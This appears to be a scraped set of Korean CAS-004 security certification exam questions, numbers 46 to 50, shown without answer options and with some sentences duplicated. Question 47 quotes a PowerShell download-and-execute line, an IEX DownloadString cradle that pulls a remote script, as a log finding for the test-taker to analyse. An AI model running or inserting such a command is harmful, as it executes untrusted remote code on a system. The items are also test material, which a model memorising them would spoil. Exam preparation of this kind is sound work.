CAS-004 문제 46
보안 분석가가 클라이언트를 대신하여 취약성 평가를 수행하고 있습니다. 분석가는 조직에 대한 위험을 구성하는 요소를 정의해야 합니다.
다음 중 분석가의 첫 번째 조치는 무엇입니까?
다음 중 분석가의 첫 번째 조치는 무엇입니까?
CAS-004 문제 47
보안 분석가는 외부 메일 서버에 대한 로그인 시도 실패 횟수가 꾸준히 증가하는 것을 발견했습니다. 점프 박스 중 하나를 조사하는 동안 분석가는 로그 파일에서 powershell EX(New-Object Net.WebClient).DownloadString('https://content.comptia.org/casp/whois.psl')을 식별했습니다. );whois 다음 보안 제어 중 어떤 것이 공격의 다음 단계에 경고를 보내고 방지할 수 있습니까?
CAS-004 문제 48
A사는 B사와 계약을 맺고 있습니다.
계약 조건은 지불 조건, 책임 제한 및 지적 재산권을 다루는 문서로 공식화됩니다. 다음 중 이러한 요소를 포함할 가능성이 가장 높은 문서는 무엇입니까?
계약 조건은 지불 조건, 책임 제한 및 지적 재산권을 다루는 문서로 공식화됩니다. 다음 중 이러한 요소를 포함할 가능성이 가장 높은 문서는 무엇입니까?
CAS-004 문제 49
조직에서는 모범 사례 보안 구성을 기준으로 모든 시스템을 검사하려고 합니다.
다음 중 어떤 SCAP 표준을 결합하면 조직이 채우기 자동화를 위해 기계가 읽을 수 있는 체크리스트 형식으로 각 구성 검사를 볼 수 있게 됩니까? (2개를 선택하세요.)
다음 중 어떤 SCAP 표준을 결합하면 조직이 채우기 자동화를 위해 기계가 읽을 수 있는 체크리스트 형식으로 각 구성 검사를 볼 수 있게 됩니까? (2개를 선택하세요.)
CAS-004 문제 50
최근 한 조직에서 랜섬웨어 공격을 경험했습니다. 보안팀장은 공격이 재발하는 것을 우려하고 있다. 그러나 추가 보안 조치는 구현되지 않았습니다.
다음 중 잠재적인 예방 권장 사항을 식별하는 데 사용할 수 있는 프로세스는 무엇입니까?
다음 중 잠재적인 예방 권장 사항을 식별하는 데 사용할 수 있는 프로세스는 무엇입니까?